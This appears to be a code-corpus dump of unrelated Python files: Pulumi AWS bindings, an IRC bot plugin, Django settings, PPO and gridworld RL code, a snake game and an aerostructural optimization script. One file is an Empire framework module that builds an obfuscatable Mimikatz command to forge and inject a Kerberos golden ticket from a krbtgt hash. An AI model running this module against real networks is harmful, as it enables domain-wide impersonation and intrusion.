$ pulumi import aws:swf/domain:Domain foo test-domain
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an SWF Domain resource.
## Example Usage
To register a basic SWF domain:
```python
import pulumi
import pulumi_aws as aws
foo = aws.swf.Domain("foo",
description="SWF Domain",
workflow_execution_retention_period_in_days="30")
```
## Import
SWF Domains can be imported using the `name`, e.g.
```sh
$ pulumi import aws:swf/domain:Domain foo test-domain
```
:param str resource_name: The name of the resource.
:param DomainArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainArgs.__new__(DomainArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["name_prefix"] = name_prefix
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if workflow_execution_retention_period_in_days is None and not opts.urn:
raise TypeError("Missing required property 'workflow_execution_retention_period_in_days'")
__props__.__dict__["workflow_execution_retention_period_in_days"] = workflow_execution_retention_period_in_days
__props__.__dict__["arn"] = None
super(Domain, __self__).__init__(
'aws:swf/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None) -> 'Domain':
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainState.__new__(_DomainState)
__props__.__dict__["arn"] = arn
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["name_prefix"] = name_prefix
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["workflow_execution_retention_period_in_days"] = workflow_execution_retention_period_in_days
return Domain(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The domain description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the domain. If omitted, this provider will assign a random, unique name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="namePrefix")
def name_prefix(self) -> pulumi.Output[Optional[str]]:
"""
Creates a unique name beginning with the specified prefix. Conflicts with `name`.
"""
return pulumi.get(self, "name_prefix")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter(name="workflowExecutionRetentionPeriodInDays")
def workflow_execution_retention_period_in_days(self) -> pulumi.Output[str]:
"""
Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
return pulumi.get(self, "workflow_execution_retention_period_in_days")
|
py | 1a33117c9f83cc2a7bae91e27af7584770db29ba | # Copyright 2015 Jason Meridth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pyhole Allergies Plugin"""
import datetime
from pyhole.core import plugin
from pyhole.core import utils
class Allergies(plugin.Plugin):
"""Provide access to current allergy data."""
@plugin.hook_add_command("allergies")
@utils.spawn
def allergies(self, message, params=None, **kwargs):
"""Display current allergies in San Antonio, TX (ex: .allergies)."""
d = datetime.datetime.now()
weekend = d.isoweekday() in (6, 7)
if weekend:
message.dispatch("Unable to fetch allergy data on weekends.")
return
today = d.strftime("%Y-%m-%d")
url = "http://saallergy.info/day/%s" % today
headers = {"accept": "application/json"}
response = utils.fetch_url(url, headers=headers)
if response.status_code != 200:
return
data = response.json()
text = "Allergies for %s: " % today
for a in data["results"]:
text = text + "%s - %s (%s) | " % (a["allergen"], a["level"],
a["count"])
text = text.rstrip(" ")
text = text.rstrip("|")
message.dispatch(text)
@plugin.hook_add_command("pollen")
def alias_pollen(self, message, params=None, **kwargs):
"""Alias of allergies."""
self.allergies(message, params, **kwargs)
|
py | 1a3312375f5cf618a552ed07da27a18f74b2f20f | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.9.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Los_Angeles'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
py | 1a33131158cee63b2541c0655a10df647a2304f6 | """
To run the code for each problem, simply run the 'runP#.py' file.
So for this problem, run runP3.py
The P#classes.py files are very similar across problems,
but each includes a scaling which is (roughly) optimized for that specific problem.
The runP#.py file will automatically import the necessary classes from the appropriate location.
"""
import torch
import torch.nn as nn
from torch.distributions import Normal
import cv2
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear_memory(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1, n_latent_var_c2):
super(ActorCritic, self).__init__()
# actor
self.action_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_a1),
nn.ReLU(),
nn.Linear(n_latent_var_a1, n_latent_var_a2),
nn.ReLU(),
nn.Linear(n_latent_var_a2, action_dim)
)
# critic
self.value_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_c1),
nn.ReLU(),
nn.Linear(n_latent_var_c1, n_latent_var_c2),
nn.ReLU(),
nn.Linear(n_latent_var_c2, 1)
)
def forward(self):
raise NotImplementedError
def act(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = dist.sample()
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
return action.detach().numpy()
def act_deterministic(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = action_probs
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
return action.detach().numpy()
def evaluate(self, state, action, std_scale):
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_value = self.value_layer(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
def film_stochastic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
def film_deterministic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act_deterministic(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
class PPO:
def __init__(self, environment, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1,
n_latent_var_c2, lr, gamma, K_epochs, eps_clip, entropy_beta, critic_coef):
self.environment = environment
self.lr = lr
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.entropy_beta = entropy_beta
self.critic_coef = critic_coef
self.policy = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=lr)
self.policy_old = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def update(self, memory, std_scale):
# I found that for my implementation, using this form of the rollouts worked best
disc_reward = 0
rewards_bin = []
# We begin with the latest rewards, and work backwards
for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):
if is_terminal:
disc_reward = 0
disc_reward = (disc_reward * self.gamma) + reward
# Insert backwards, since we 'reversed' above.
rewards_bin.insert(0, disc_reward)
rewards = torch.tensor(rewards_bin).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# Must convert lists to tensors
old_logprobs = torch.stack(memory.logprobs).to(device).detach()
old_actions = torch.stack(memory.actions).to(device).detach()
old_states = torch.stack(memory.states).to(device).detach()
# Now we optimize the policy
for _ in range(self.K_epochs):
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions, std_scale=std_scale)
# First we find the ratio of the probabilities of selecting action a_t, given state s_t, under
# the new and old policies, respectively.
# We can use the log to make this more computationally efficient.
newold_ratio = torch.exp(logprobs - old_logprobs.detach())
# subtract of the state-values from the rewards to get the advantages
advantages = rewards - state_values.detach()
# Reshape this
newold_ratio = newold_ratio.view(2, -1)
target1 = newold_ratio * advantages
# In pytorch, 'clamp' is how we clip.
target2 = torch.clamp(newold_ratio, 1 - self.eps_clip, 1 + self.eps_clip)
target3 = target2 * advantages
# We need to isolate out the third term to reshape it appropriately
entropy = self.entropy_beta * dist_entropy
entropy = entropy.view(2, -1)
actor_loss = -torch.min(target1, target3)
critic_loss = self.critic_coef * self.MseLoss(state_values, rewards)
# Now we have our total loss
loss = actor_loss + critic_loss - entropy
# now perform update via gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
self.policy_old.load_state_dict(self.policy.state_dict()) |
py | 1a3313792be3c0e9bbda7730a9050e6fd26fb8b7 | from turtle import Turtle, Screen
import time
screen = Screen()
screen.bgcolor('black')
screen.title('My Snake Game')
screen.tracer(0)
starting_positions = [(0, 0), (-20, 0), (-48, 0)]
pace = 20
segments = []
for position in starting_positions:
new_segment = Turtle("square")
new_segment.color("white")
new_segment.penup()
new_segment.goto(position)
segments.append(new_segment)
game_is_on = True
while game_is_on:
screen.update()
time.sleep(0.1)
for seg_num in range(len(segments) - 1, 0, -1):
new_x = segments[seg_num - 1].xcor()
new_y = segments[seg_num - 1].ycor()
segments[seg_num].goto(new_x, new_y)
segments[0].forward(pace)
screen.exitonclick() |
py | 1a33165ccd7886e5b2733adde7dd686bca7c6403 | from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.database.models import Credential
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.username != "krbtgt":
return handle_error_message("[!] A krbtgt account must be used")
if cred.domain != "":
params["domain"] = cred.domain
if cred.sid != "":
params["sid"] = cred.sid
if cred.password != "":
params["krbtgt"] = cred.password
if params["krbtgt"] == "":
print(helpers.color("[!] krbtgt hash not specified"))
# build the golden ticket command
script_end = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != '':
script_end += " /" + str(option) + ":" + str(values)
script_end += " /ptt\"'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
py | 1a3316c956aed07c34591ad62506aa44a006bb47 | import numpy as np
import openmdao.api as om
from mphys.multipoint import Multipoint
from mphys.scenario_aerostructural import ScenarioAeroStructural
from vlm_solver.mphys_vlm import VlmBuilder
from tacs.mphys import TacsBuilder
from mphys.solver_builders.mphys_meld import MeldBuilder
from struct_dv_components import StructDvMapper, SmoothnessEvaluatorGrid, struct_comps
import tacs_setup
check_derivs = False
class Top(Multipoint):
def setup(self):
# VLM
mesh_file = 'wing_VLM.dat'
mach = 0.85
aoa0 = 2.0
aoa1 = 5.0
q_inf = 12000.
vel = 178.
nu = 3.5E-5
aero_builder = VlmBuilder(mesh_file)
aero_builder.initialize(self.comm)
dvs = self.add_subsystem('dvs', om.IndepVarComp(), promotes=['*'])
dvs.add_output('aoa', val=[aoa0,aoa1], units='deg')
dvs.add_output('mach', mach)
dvs.add_output('q_inf', q_inf)
dvs.add_output('vel', vel)
dvs.add_output('nu', nu)
self.add_subsystem('mesh_aero',aero_builder.get_mesh_coordinate_subsystem())
# TACS
tacs_options = {'element_callback': tacs_setup.element_callback,
'problem_setup': tacs_setup.problem_setup,
'mesh_file': 'wingbox_Y_Z_flip.bdf'}
struct_builder = TacsBuilder(tacs_options)
struct_builder.initialize(self.comm)
self.add_subsystem('mesh_struct',struct_builder.get_mesh_coordinate_subsystem())
initial_thickness = 0.003
dvs.add_output('ribs', val=initial_thickness, shape = struct_comps['ribs'])
dvs.add_output('le_spar', val=initial_thickness, shape = struct_comps['le_spar'])
dvs.add_output('te_spar', val=initial_thickness, shape = struct_comps['te_spar'])
dvs.add_output('up_skin', val=initial_thickness, shape = struct_comps['up_skin'])
dvs.add_output('lo_skin', val=initial_thickness, shape = struct_comps['lo_skin'])
dvs.add_output('up_stringer', val=initial_thickness, shape = struct_comps['up_stringer'])
dvs.add_output('lo_stringer', val=initial_thickness, shape = struct_comps['lo_stringer'])
self.add_subsystem('struct_mapper',StructDvMapper(), promotes=['*'])
# MELD setup
isym = 1
ldxfer_builder = MeldBuilder(aero_builder, struct_builder, isym=isym)
ldxfer_builder.initialize(self.comm)
for iscen, scenario in enumerate(['cruise','maneuver']):
nonlinear_solver = om.NonlinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1E-14, atol=1E-14)
linear_solver = om.LinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1e-14, atol=1e-14)
self.mphys_add_scenario(scenario,ScenarioAeroStructural(aero_builder=aero_builder,
struct_builder=struct_builder,
ldxfer_builder=ldxfer_builder),
nonlinear_solver, linear_solver)
for discipline in ['aero','struct']:
self.mphys_connect_scenario_coordinate_source('mesh_%s' % discipline, scenario, discipline)
for dv in ['q_inf','vel','nu','mach','dv_struct']:
self.connect(dv, f'{scenario}.{dv}')
self.connect('aoa', f'{scenario}.aoa', src_indices=[iscen])
self.add_subsystem('le_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['le_spar'],rows=1))
self.add_subsystem('te_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['te_spar'],rows=1))
self.add_subsystem('up_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=struct_comps['up_skin']//9))
self.add_subsystem('lo_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=int(struct_comps['lo_skin']/9)))
self.connect('le_spar','le_spar_smoothness.thickness')
self.connect('te_spar','te_spar_smoothness.thickness')
self.connect('up_skin','up_skin_smoothness.thickness')
self.connect('lo_skin','lo_skin_smoothness.thickness')
################################################################################
# OpenMDAO setup
################################################################################
prob = om.Problem()
prob.model = Top()
model = prob.model
# optimization set up
prob.model.add_design_var('aoa',lower=-5*np.pi/180, upper=10*np.pi/180.0, ref=1.0, units='rad')
prob.model.add_design_var('ribs', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('le_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('te_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_objective('cruise.mass',ref=1000.0)
prob.model.add_constraint('cruise.C_L',ref=1.0,equals=0.5)
prob.model.add_constraint('maneuver.C_L',ref=1.0,equals=0.9)
prob.model.add_constraint('maneuver.ks_vmfailure',ref=1.0, upper = 2.0/3.0)
prob.model.add_constraint('le_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('te_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('up_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('lo_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
#prob.driver = om.ScipyOptimizeDriver(debug_print=['ln_cons','nl_cons','objs','totals'])
prob.driver = om.ScipyOptimizeDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['tol'] = 1e-8
prob.driver.options['disp'] = True
prob.driver.recording_options['includes'] = ['*']
prob.driver.recording_options['record_objectives'] = True
prob.driver.recording_options['record_constraints'] = True
prob.driver.recording_options['record_desvars'] = True
recorder = om.SqliteRecorder("cases.sql")
prob.driver.add_recorder(recorder)
prob.setup(mode='rev')
om.n2(prob, show_browser=False, outfile='mphys_as_vlm.html')
if check_derivs:
prob.run_model()
prob.check_totals(of=['cruise.mass','cruise.C_L','maneuver.ks_vmfailure'],
wrt=['aoa','ribs'])
else:
prob.run_driver()
cr = om.CaseReader('cases.sql')
driver_cases = cr.list_cases('driver')
matrix = np.zeros((len(driver_cases),4))
for i, case_id in enumerate(driver_cases):
matrix[i,0] = i
case = cr.get_case(case_id)
matrix[i,1] = case.get_objectives()['cruise.mass'][0]
matrix[i,2] = case.get_constraints()['cruise.C_L'][0]
matrix[i,3] = case.get_constraints()['maneuver.ks_vmfailure'][0]
np.savetxt('history.dat',matrix)
|
py | 1a3316d5d4b84e8855dcda39a3d4dce53c8d4901 | # You wish to buy video games from the famous online video game store Mist.
# Usually, all games are sold at the same price, p dollars. However, they are planning to have the seasonal
# Halloween Sale next month in which you can buy games at a cheaper price. Specifically, the first game you
# buy during the sale will be sold at p dollars, but every subsequent game you buy will be sold at exactly d dollars less than the
# cost of the previous one you bought. This will continue until the cost becomes less than or equal to m dollars,
# after which every game you buy will cost m dollars each.
# For example, if p = 20, d = 3 and m = 6 then the following are the
# costs of the first games you buy, in order:
# 20, 17, 14, 11, 8, 6, 6, 6, 6, 6, 6
# You have s dollars in your Mist wallet.
# How many games can you buy during the Halloween Sale?
# Input Format
# The first and only line of input contains four space-separated integers
# p, d, m and s.
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the howManyGames function below.
def howManyGames(p, d, m, s):
# Return the number of games you can buy
l = []
n = p # Creating n from p (contains the remaining values)
if l == [] and p <= s:
l.append(p)
elif p > s:
return 0
n -= d
if (sum(l) + n) > s:
return len(l)
while n > m and (sum(l) + n) <= s:
l.append(n)
n -= d
while sum(l) + m <= s:
l.append(m)
n -= m
print(l)
return len(l)
if __name__ == "__main__":
fptr = open(os.environ["OUTPUT_PATH"], "w")
pdms = input().split()
p = int(pdms[0]) # Games sold at same price
d = int(pdms[1]) # d dollars less than previous one
m = int(pdms[2]) # less less than m
s = int(pdms[3])
answer = howManyGames(p, d, m, s)
fptr.write(str(answer) + "\n")
fptr.close()
# Output Format
# Print a single line containing a single integer denoting the maximum number of
# games you can buy.
# Sample Input 0
# 20 3 6 80
# Sample Output 0
# 6
# Explanation 0
# We have p = 20, d = 3 and m = 6, the same as in the problem statement.
# We also have dollars s = 80. We can buy 6 games since they cost 20 + 17 + 14 + 11 + 8 + 6 = 76 dollars.
# However, we cannot buy a 7th game. Thus, the answer is 6.
# Sample Input 1
# 20 3 6 85
# Sample Output 1
# 7
# Explanation 1
# This is the same as the previous case, except this time we have s = 85
# dollars. This time, we can buy 7 games since they cost 20 + 17 + 14 + 11 + 8 + 6 + 6 = 82 dollars.
# However, we cannot buy an 8th game. Thus, the answer is 7.
|
py | 1a33178fc3898f1ff69e6c056a735b30dc06026b | import numpy as np
import random
import itertools
import scipy.misc
from PIL import Image
import matplotlib.pyplot as plt
class gameOb():
def __init__(self,coordinates,size,intensity,channel,reward,name):
self.x = coordinates[0]
self.y = coordinates[1]
self.size = size
self.intensity = intensity
self.channel = channel
self.reward = reward
self.name = name
class gameEnv():
def __init__(self,partial,size):
self.sizeX = size
self.sizeY = size
self.actions = 4
self.objects = []
self.partial = partial
a = self.reset()
plt.imshow(a,interpolation="nearest")
plt.axis("off")
def reset(self):
self.objects = []
hero = gameOb(self.newPosition(),1,1,2,None,'hero')
self.objects.append(hero)
bug = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug)
hole = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole)
bug2 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug2)
hole2 = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole2)
bug3 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug3)
bug4 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug4)
state = self.renderEnv()
self.state = state
return state
def moveChar(self,direction):
# 0 - up, 1 - down, 2 - left, 3 - right
hero = self.objects[0]
heroX = hero.x
heroY = hero.y
penalize = 0.
if direction == 0 and hero.y >= 1:
hero.y -= 1
if direction == 1 and hero.y <= self.sizeY-2:
hero.y += 1
if direction == 2 and hero.x >= 1:
hero.x -= 1
if direction == 3 and hero.x <= self.sizeX-2:
hero.x += 1
if hero.x == heroX and hero.y == heroY:
penalize = 0.0
self.objects[0] = hero
return penalize
def newPosition(self):
iterables = [ range(self.sizeX), range(self.sizeY)]
points = []
for t in itertools.product(*iterables):
points.append(t)
currentPositions = []
for objectA in self.objects:
if (objectA.x,objectA.y) not in currentPositions:
currentPositions.append((objectA.x,objectA.y))
for pos in currentPositions:
points.remove(pos)
location = np.random.choice(range(len(points)),replace=False)
return points[location]
def checkGoal(self):
others = []
for obj in self.objects:
if obj.name == 'hero':
hero = obj
else:
others.append(obj)
ended = False
for other in others:
if hero.x == other.x and hero.y == other.y:
self.objects.remove(other)
if other.reward == 1:
self.objects.append(gameOb(self.newPosition(),1,1,1,1,'goal'))
else:
self.objects.append(gameOb(self.newPosition(),1,1,0,-1,'fire'))
return other.reward,False
if ended == False:
return 0.0,False
def renderEnv(self):
#a = np.zeros([self.sizeY,self.sizeX,3])
a = np.ones([self.sizeY+2,self.sizeX+2,3])
a[1:-1,1:-1,:] = 0
hero = None
for item in self.objects:
a[item.y+1:item.y+item.size+1,item.x+1:item.x+item.size+1,item.channel] = item.intensity
if item.name == 'hero':
hero = item
if self.partial == True:
a = a[hero.y:hero.y+3,hero.x:hero.x+3,:]
